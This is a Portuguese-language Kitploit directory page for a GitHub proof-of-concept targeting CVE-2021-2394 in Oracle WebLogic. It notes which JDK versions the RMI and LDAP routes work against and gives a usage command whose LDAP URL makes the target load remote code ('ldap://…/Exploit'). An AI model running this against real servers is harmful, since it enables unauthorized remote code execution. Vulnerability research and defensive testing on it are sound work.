Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-2394 — POC da CVE-2021-2394 | Kitploit
Ferramentas/GitHubGitHub/lz2y/cve-2021-2394
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHublz2y/cve-2021-2394

CVE-2021-2394

POC da CVE-2021-2394

Ver Repositório
4020há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-2394

POC do CVE-2021-2394

  • Aviso de isenção de responsabilidade
    • O projeto é destinado apenas a fins de aprendizado. Quaisquer consequências ou perdas, diretas ou indiretas, causadas por testes não autorizados, são de responsabilidade do próprio usuário.
  • Observações

    • O POC usa IIOP para enviar pacotes. Adicione as dependências relacionadas (as dependências da versão 12.2.1.3.0 foram disponibilizadas no release).
    • Use uma versão antiga do jdk para instalar o weblogic e executar os testes.

      O método de exploração baseado em RMI é limitado às versões do JDK anteriores a 6u132, 7u131 e 8u121. Nas versões 8u122 e posteriores, foi adicionado o mecanismo de lista de permissões (whitelist) de desserialização, desativando o carregamento remoto de código RMI. O método de exploração baseado em LDAP é limitado às versões do JDK anteriores a 6u211, 7u201, 8u191 e 11.0.1. Na versão 8u191, a Oracle impôs restrições ao vetor LDAP, publicou o CVE-2018-3149 e desativou o carregamento remoto de classes JNDI. Fonte: https://www.freebuf.com/vuls/279465.html

    • Se não for possível reproduzir em um ambiente de máquina virtual, consulte https://xz.aliyun.com/t/7498
  • Modo de uso:

    • Inicie um serviço ldap
    • java -jar CVE_2021_2394.jar rhost rport ldapurl
    • ex.:java -jar CVE_2021_2394.jar 192.168.137.1 7001 ldap://192.168.137.1:8087/Exploit
  • Links de referência:

    • https://mp.weixin.qq.com/s/onoMpyenDkMmsoGEw8VO2A
    • https://github.com/Y4er/CVE-2020-14756
    • https://github.com/Y4er/CVE-2020-2551
  • Atualizações

    • 2021/8/15 Removido algum código desnecessário.
  • Artigo de análise

    • https://mp.weixin.qq.com/s/AxJJxbkclr4ijXX8lpNAfw
Baixar ferramenta